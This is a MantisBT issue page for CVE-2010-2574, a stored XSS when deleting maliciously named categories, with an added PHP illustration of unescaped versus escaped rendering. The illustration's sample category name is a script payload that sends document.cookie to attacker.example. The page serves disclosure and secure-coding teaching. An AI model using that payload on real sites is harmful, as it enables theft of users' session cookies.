View Issue Details

ID: 0012230
Project: mantisbt
Category: security
View Status: public
Last Update: 2015-03-15 20:07
Reporter: jreese
Assigned To:
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.2.2
Target Version: 1.2.3
Fixed in Version: 1.2.3
Summary: 0012230: CVE-2010-2574: XSS vulnerability when deleting maliciously named categories
Description

As reported by Secunia, SA40832, there is an XSS vulnerability when deleting categories that have been maliciously named. Chance of attack is extremely low due to requiring project manager access.

Additional Information

Official Secunia announcement: http://secunia.com/advisories/40832/
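The pattern behind this class of bug, as an added illustration that is not MantisBT's own code and is not part of the report or of the fix: a stored category name concatenated straight into the HTML of a delete confirmation page, beside the same page with the name escaped for its HTML context. The page layout, the function names and the sample category name below are all hypothetical and belong to a standalone PHP script; it does not show what manage_proj_cat_delete.php actually did or how the changeset corrected it.

```php
<?php
// Added illustration of a stored XSS through a "maliciously named" record.
// Hypothetical standalone script, not MantisBT code. Assumptions:
//  - the delete page builds an HTML confirmation that echoes the stored name;
//  - the name is free text that a privileged user (project manager) can set.
declare(strict_types=1);

// Constructed sample: a category name that a project manager could have saved.
// The payload is inert here; it is only rendered into strings and inspected.
const MALICIOUS_CATEGORY_NAME =
    'Bugs<script>document.location="https://attacker.example/?c="+document.cookie</script>';

/**
 * Vulnerable pattern: the stored name is concatenated into HTML as-is, so
 * markup inside the name is rendered as markup and the script runs in the
 * browser of whoever opens the delete confirmation page (here, a manager
 * or administrator, which is why the report rates the risk as low but real).
 */
function render_confirm_vulnerable(string $p_category_name): string
{
    return '<p>Are you sure you want to delete category <b>'
        . $p_category_name . '</b>?</p>';
}

/**
 * Escape for an HTML text or attribute-value context.
 * ENT_QUOTES neutralises both quote kinds, so the same helper is safe inside
 * a double- or single-quoted attribute; the explicit charset avoids bypasses
 * that rely on the default encoding differing from the page encoding.
 */
function html_escape(string $p_text): string
{
    return htmlspecialchars($p_text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened pattern: same page, name escaped at the point of output. */
function render_confirm_fixed(string $p_category_name): string
{
    return '<p>Are you sure you want to delete category <b>'
        . html_escape($p_category_name) . '</b>?</p>';
}

/**
 * The confirmation form usually carries the value back in a hidden field.
 * That is an attribute context, where a stray quote is as dangerous as an
 * angle bracket, so the value is escaped there too.
 */
function hidden_field_fixed(string $p_name, string $p_value): string
{
    return '<input type="hidden" name="' . html_escape($p_name)
        . '" value="' . html_escape($p_value) . '" />';
}

/** Crude check used only by this demo: does a live <script> tag survive? */
function contains_live_script(string $p_html): bool
{
    return stripos($p_html, '<script') !== false;
}

$t_vulnerable = render_confirm_vulnerable(MALICIOUS_CATEGORY_NAME);
$t_fixed      = render_confirm_fixed(MALICIOUS_CATEGORY_NAME);

printf("vulnerable output contains a live <script>: %s\n",
    contains_live_script($t_vulnerable) ? 'yes' : 'no');
printf("escaped output contains a live <script>:    %s\n",
    contains_live_script($t_fixed) ? 'yes' : 'no');
echo $t_fixed, "\n";
echo hidden_field_fixed('category', MALICIOUS_CATEGORY_NAME), "\n";
```

Run it with the PHP CLI; the vulnerable rendering carries the script element through to the browser, the escaped rendering shows it as harmless text. Escaping is context-specific: htmlspecialchars with ENT_QUOTES covers HTML text and quoted attribute values, which is what a confirmation page needs, but it is not sufficient for a JavaScript, CSS or URL context, and the check for a privileged creator (project manager access, as the report notes) limits who can plant such a name but does not remove the need to escape it on output.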

Tags: No tags attached.

Relationships

related to 0012231 (closed, dhx): XSS vulnerability when uninstalling maliciously named plugins
related to 0012369 (closed, giallu): CVE-2010-2574: XSS vulnerability when deleting maliciously named categories

Activities

dhx
2010-08-04 09:28
reporter ~0026211

All fixed, thanks John :)

jreese
2010-08-05 18:13
reporter ~0026236

Last edited: 2010-08-05 18:21

Official Secunia announcement: http://secunia.com/advisories/40832/

oberger
2010-09-04 17:31
reporter ~0026578

For future reference, this is also CVE-2010-2574 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2574)

Related Changesets

MantisBT: master 083c34f0

2010-08-04 09:17

dhx

Fix 0012230: XSS vulnerability when deleting maliciously named categories

As reported by Secunia, SA40832, there is an XSS vulnerability when
deleting project categories that have been maliciously named. The chance
of attack is low due to requiring project manager access to create
malicious project categories in the first place.

Thanks to John Reese for debugging this issue.
Affected Issues: 0012230
mod - manage_proj_cat_delete.php

MantisBT: master-1.2.x a374a7c9

2010-08-04 09:17

dhx

Fix 0012230: XSS vulnerability when deleting maliciously named categories

As reported by Secunia, SA40832, there is an XSS vulnerability when
deleting project categories that have been maliciously named. The chance
of attack is low due to requiring project manager access to create
malicious project categories in the first place.

Thanks to John Reese for debugging this issue.
Affected Issues: 0012230
mod - manage_proj_cat_delete.php